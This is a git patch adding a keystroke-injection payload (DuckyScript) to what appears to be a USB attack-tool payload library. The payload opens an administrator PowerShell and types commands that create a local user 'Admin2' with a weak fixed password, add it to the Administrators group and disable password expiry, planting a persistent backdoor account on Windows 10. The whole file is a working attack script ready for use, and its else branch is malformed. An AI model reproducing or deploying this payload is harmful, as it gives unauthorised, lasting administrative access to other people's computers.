From 03c41b5d326ed3e267628a96a1c089ee695362a2 Mon Sep 17 00:00:00 2001
From: LulzAnarchyAnon <lulzanarchyanongsa@gmail.com>
Date: Sat, 2 Jul 2022 16:38:50 -0700
Subject: [PATCH] Create payload.txt

---
 .../execution/Add_Local_Admin/payload.txt     | 71 +++++++++++++++++++
 1 file changed, 71 insertions(+)
 create mode 100644 payloads/library/execution/Add_Local_Admin/payload.txt

diff --git a/payloads/library/execution/Add_Local_Admin/payload.txt b/payloads/library/execution/Add_Local_Admin/payload.txt
new file mode 100644
index 0000000..e1c8269
--- /dev/null
+++ b/payloads/library/execution/Add_Local_Admin/payload.txt
@@ -0,0 +1,71 @@
+REM Title: Add_Local_Admin
+REM Author: LulzAnarchyAnon
+REM Description: Administrator PowerShell is opened, and a script 
+REM runs that adds a Local Admin User. 
+REM Target: Windows 10 PowerShell 
+REM Props: Darren Kitchen, and I am Jakoby
+REM Version: 1.0
+REM Category: Execution
+
+GUI x
+DELAY 500
+a
+DELAY 500
+ALT y
+Delay 2000
+
+STRING $Username = "Admin2"
+DELAY 2000
+ENTER
+STRING $Password = "password"
+DELAY 2000
+ENTER
+STRING $group = "Administrators"
+DELAY 2000
+ENTER
+STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
+DELAY 5000
+ENTER
+STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
+DELAY 5000
+ENTER
+STRING if ($existing -eq $null) {
+DELAY 2000
+ENTER
+STRING    Write-Host "Creating new local user $Username."
+DELAY 5000
+ENTER
+STRING    & NET USER $Username $Password /add /y /expires:never
+DELAY 5000  
+ENTER 
+STRING    Write-Host "Adding local user $Username to $group."
+DELAY 5000
+ENTER
+STRING    & NET LOCALGROUP $group $Username /add
+DELAY 5000
+ENTER
+STRING }
+DELAY 2000
+ENTER
+STRING      {
+DELAY 2000
+ENTER
+STRING    Write-Host "Setting password for existing local user $Username."
+DELAY 5000
+ENTER
+STRING    $existing.SetPassword($Password)
+DELAY 2000
+ENTER
+STRING }
+DELAY 2000
+ENTER
+STRING Write-Host "Ensuring password for $Username never expires."
+DELAY 5000
+ENTER
+STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
+DELAY 5000
+ENTER
+DELAY 1000
+STRING exit
+DELAY 100
+ENTER